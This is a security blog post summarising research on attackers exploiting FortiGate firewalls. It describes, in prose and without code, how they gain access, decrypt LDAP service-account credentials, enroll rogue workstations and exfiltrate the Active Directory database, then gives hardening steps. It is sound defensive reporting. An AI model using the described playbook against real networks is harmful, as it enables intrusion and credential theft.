Back to Blog
FortiGate Devices Exploited to Breach Networks: Why Your Firewall May Be Your Weakest Link
3/10/2026
Steve

FortiGate Devices Exploited to Breach Networks: Why Your Firewall May Be Your Weakest Link

When SentinelOne researchers disclosed that threat actors are actively exploiting FortiGate Next-Generation Firewall (NGFW) appliances to breach networks and steal service account credentials, it sent a clear warning to organizations everywhere: the devices you deployed to protect your network may be your weakest link. Healthcare providers, government agencies, and managed service providers (MSPs) are in the crosshairs, and the attack playbook is both sophisticated and alarmingly effective.

This is not a theoretical vulnerability. Attackers are actively exploiting CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858—or simply using weak credentials and misconfigurations—to gain initial access. Once inside, they are extracting configuration files, decrypting service account credentials, and using that access to authenticate to Active Directory, enroll rogue workstations, and move laterally across victim environments.

If your organization relies on FortiGate appliances, or any NGFW with Active Directory integration, this is the moment to audit configurations, rotate credentials, and harden access controls.

The Attack Playbook: From Firewall to Domain Compromise

The SentinelOne investigation reveals a multi-stage attack that begins with network appliance compromise and ends with Active Directory authentication and credential harvesting.

Stage 1: Initial Access

Attackers gain entry to FortiGate appliances through one of three paths:

  • Exploitation of known vulnerabilities (CVE-2025-59718, CVE-2025-59719, CVE-2026-24858)
  • Compromise of weak administrative credentials
  • Exploitation of misconfigurations that expose management interfaces

Once inside, the threat actors create persistence. In one documented case from November 2025, attackers created a new local administrator account named "support" and configured four firewall policies allowing unrestricted traversal across all network zones.

Stage 2: Credential Harvesting

The primary objective is extracting configuration files that contain encrypted service account credentials. FortiGate appliances integrated with Active Directory and LDAP often store these credentials to enable role-based policy enforcement and network security alert correlation.

In the February 2026 phase of the attack, threat actors:

  • Extracted configuration files containing LDAP credentials for the fortidcagent service account
  • Decrypted the credentials
  • Authenticated to Active Directory using those clear-text credentials
  • Enrolled rogue workstations in the domain

Stage 3: Lateral Movement and Exfiltration

With domain access established, attackers initiated network scanning—triggering detection in at least one case. However, in a separate January 2026 incident, attackers moved faster:

  • Deployed remote access tools (Pulseway, MeshAgent)
  • Downloaded Java malware via PowerShell from AWS infrastructure
  • Used DLL side-loading to execute the malware
  • Exfiltrated the NTDS.dit file (Active Directory database) and SYSTEM registry hive to an external server over port 443

The NTDS.dit file contains every user, computer, and group object in the domain—essentially a complete credential database that can be cracked offline.

Why NGFW Appliances Are High-Value Targets

The appeal of network appliances to threat actors is straightforward: they sit at the network perimeter, they have privileged access to internal systems, and they are often overlooked in security hardening efforts.

"FortiGate network appliances have considerable access to the environments they were installed to protect," SentinelOne researchers noted. "In many configurations, this includes service accounts which are connected to the authentication infrastructure, such as Active Directory and LDAP."

This access enables appliances to:

  • Map roles to users by correlating connection attributes with directory information
  • Enforce role-based network security policies
  • Accelerate response to network security alerts

But that same integration creates a dangerous attack surface. Compromise the appliance, and you compromise the directory services that underpin the entire organization.

Initial Access Brokers (IABs) understand this value proposition. They breach networks, establish persistence, and sell that access to ransomware operators, espionage groups, and other criminal actors. The FortiGate campaign fits this pattern exactly: attackers maintained periodic checks on device accessibility for months, consistent with an IAB establishing a foothold for resale.

Actionable Steps: Hardening Your NGFW Infrastructure

If you manage FortiGate appliances—or any NGFW with AD/LDAP integration—take these steps immediately.

1. Patch Vulnerabilities

Apply patches for CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858. These are known exploitation vectors. If your appliances cannot be updated immediately, isolate management interfaces from the internet and restrict access to trusted IP ranges.

2. Audit Service Account Credentials

Review every service account referenced in your NGFW configuration:

  • Rotate passwords immediately
  • Use managed service accounts or group managed service accounts (gMSA) where possible
  • Limit delegation rights to the minimum required for the appliance function
  • Disable any service accounts that are no longer in use

3. Review Administrative Accounts

Check for unauthorized administrator accounts—especially any named "support" or similar generic terms. In the documented attack, the threat actor created exactly such an account to maintain persistence.

4. Restrict Management Interfaces

Management interfaces should not be exposed to the internet. Restrict access to:

  • Dedicated management VLANs
  • Trusted administrative subnets
  • Jump boxes or bastion hosts with multi-factor authentication

5. Monitor for Lateral Movement Indicators

Deploy endpoint detection and response (EDR) tools and monitor for:

  • Unusual workstation enrollment in Active Directory
  • PowerShell downloading and executing remote payloads
  • Outbound connections to unknown IPs on port 443
  • Access to NTDS.dit or SYSTEM registry hive files

6. Segment Network Zones

The attack exploited firewall policies that allowed unrestricted zone traversal. Review your firewall rules and enforce least-privilege principles:

  • Deny by default
  • Explicitly permit required traffic flows
  • Log and alert on denied attempts

7. Document and Test Incident Response

If you detect signs of compromise—unexpected admin accounts, configuration file access, rogue workstation enrollments—have a playbook ready:

  • Isolate the appliance
  • Disable associated service accounts
  • Capture forensic images of configuration and logs
  • Engage incident response support if needed

The Bigger Picture: Appliances as Attack Surface

This campaign underscores a broader security truth: every integrated system is an attack surface. Organizations that deploy NGFW appliances with Active Directory integration are extending trust to devices that sit at the network edge, often with internet-facing management interfaces.

The FortiGate exploitation campaign is not an isolated incident. It is part of a pattern where threat actors target:

  • VPN appliances (Pulse Secure, Ivanti, Fortinet)
  • Email security gateways
  • Unified threat management (UTM) devices
  • Any system with privileged directory access

"NGFW appliances have become ubiquitous because they provide strong network monitoring capabilities," SentinelOne noted. "However, these devices are high-value targets for actors with a variety of motivations and skill levels, from state-aligned actors conducting espionage to financially motivated attacks such as ransomware."

Conclusion

The FortiGate exploitation campaign is a reminder that security devices themselves require security hardening. The appliances you deployed to protect your network may have privileged access to your directory services—and threat actors are actively exploiting that trust.

Patch your appliances. Rotate service account credentials. Restrict management interfaces. Monitor for lateral movement. And treat every integrated system as a potential entry point that requires the same rigor you apply to endpoints and servers.

Your firewall may be your first line of defense. Make sure it is not also your weakest link.